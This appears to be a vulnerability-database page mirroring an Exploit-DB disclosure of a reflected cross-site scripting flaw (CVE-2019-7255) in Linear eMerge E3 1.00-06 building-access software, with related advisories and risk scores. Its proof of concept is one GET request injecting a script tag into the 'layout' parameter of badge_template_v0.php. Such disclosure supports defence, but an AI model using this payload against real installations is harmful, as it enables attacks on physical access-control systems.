eMerge E3 1.00-06 - 'layout' Reflected Cross-Site Scripting

🗓️ 12 Nov 2019 00:00:00Reported by LiquidWormType

exploitdb🔗 www.exploit-db.com👁 156 Views

eMerge E3 1.00-06 'layout' Reflected Cross-Site Scripting on badge_template_v0.ph

Reporter	Title	Published	Views	Family All 12
0day.today	eMerge E3 1.00-06 - (layout) Reflected Cross-Site Scripting Vulnerability	12 Nov 201900:00	–	zdt
CNVD	Linear eMerge E3-Series Cross-Site Scripting Vulnerability	4 Jul 201900:00	–	cnvd
CVE	CVE-2019-7255	2 Jul 201918:44	–	cve
Cvelist	CVE-2019-7255	2 Jul 201918:44	–	cvelist
exploitpack	eMerge E3 1.00-06 - layout Reflected Cross-Site Scripting	12 Nov 201900:00	–	exploitpack
ICS	Nice Linear eMerge E3-Series	5 Mar 202407:00	–	ics
Nuclei	Linear eMerge E3 - Cross-Site Scripting	4 Jun 202603:48	–	nuclei
NVD	CVE-2019-7255	2 Jul 201919:15	–	nvd
Packet Storm	Linear eMerge E3 1.00-06 Cross Site Scripting	12 Nov 201900:00	–	packetstorm
Prion	Cross site scripting	2 Jul 201919:15	–	prion

# Exploit Title: eMerge E3 1.00-06 - 'layout' Reflected Cross-Site Scripting
# Google Dork: NA
# Date: 2018-11-11
# Exploit Author: LiquidWorm
# Vendor Homepage: http://linear-solutions.com/nsc_family/e3-series/
# Software Link: http://linear-solutions.com/nsc_family/e3-series/
# Version: 1.00-06
# Tested on: NA
# CVE : CVE-2019-7255
# Advisory: https://applied-risk.com/resources/ar-2019-009
# Paper: https://applied-risk.com/resources/i-own-your-building-management-system
# Advisory: https://applied-risk.com/resources/ar-2019-005

# PoC:
GET /badging/badge_template_v0.php?layout=<script>confirm('XSS')</script> HTTP/1.1

12 Nov 2019 00:00Current

7High risk

Vulners AI Score7

CVSS 24.3

CVSS 3.16.1

EPSS0.5053

eMerge E3 1.00-06 - &#039;layout&#039; Reflected Cross-Site Scripting

eMerge E3 1.00-06 - 'layout' Reflected Cross-Site Scripting